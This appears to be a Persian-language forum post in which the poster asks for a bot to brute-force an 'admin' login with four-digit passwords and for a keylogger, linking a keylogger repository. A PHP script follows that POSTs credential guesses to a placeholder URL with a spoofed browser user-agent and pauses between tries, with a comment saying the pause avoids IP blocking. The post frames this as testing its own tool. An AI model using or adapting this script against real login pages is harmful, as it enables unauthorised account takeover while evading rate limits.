سلام دوستان

امشب یه سیستم طراحی کردم واسه تست و ساختن پسورد و اینکه یه ربات چطوری میتونه یه پسورد رو در چه زمانی پیدا کنه...

الان میخوام یه لینک رو بزارم که ربات من ۱۰۰ پسوردی رو که تولید کردم رو وارد کنه. یعنی بهش یوزر admin میدم و پسورد های 0001 تا 9999 رو در کوتاهترین فاصله زمانی تست کنه و پسورد رو برام در بیاره شبیه بروت فورس...

این ابزار رو فقط جهت تست ابزار خودم میخوام و قصد خرابکاری ندارم!

یه کد پیدا کردم اما ظاهرا چیزی نیست که من میخوام
https://github.com/rajeshmajumdar/keylogger

تفاوت این کد با کیلاگری که من میخوام چیه؟
کدی که من میخوام رو جایی هست که بتونم ازش الگو بگیرم و انجامش بدم؟

کد php



function post_curl($post)
{
//آدرسی که پارامتر ها به اونجا ارسال میشه رو اینجا وارد کنید

$ch = curl_init('http://google.com');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$userAgent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36';
curl_setopt( $ch, CURLOPT_USERAGENT, $userAgent );
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

$passwords = array(1,2,3,4,5,6,7);

foreach($passwords as $password){
//نام فیلد های یوزرنیم و پسورد رو داخل این آرایه اگر غیر از یوزرنیم و پسورد هست باید تغییر بدید

$post_data = array('username'=>'admin','password'=>$password);
$post_data = http_build_query($post_data);

$response = post_curl($post_data)

//تست لاگین شدن یا نشدن . ار چند روش از جمله کد هدر سایت میشه فهمید ولی همه ی اینها بستگی به سایت مقصد داره که بهترین راهش رو باید خودتون پیدا کنید
if(preg_match('/chizi ke bad az login movafagh dar safhe namayan mishe/siU',$response)){
echo $password;
break;
}
//یک اسلیپ 5 ثانیه ای برای بلاک نشدن آی پی
sleep(5);

}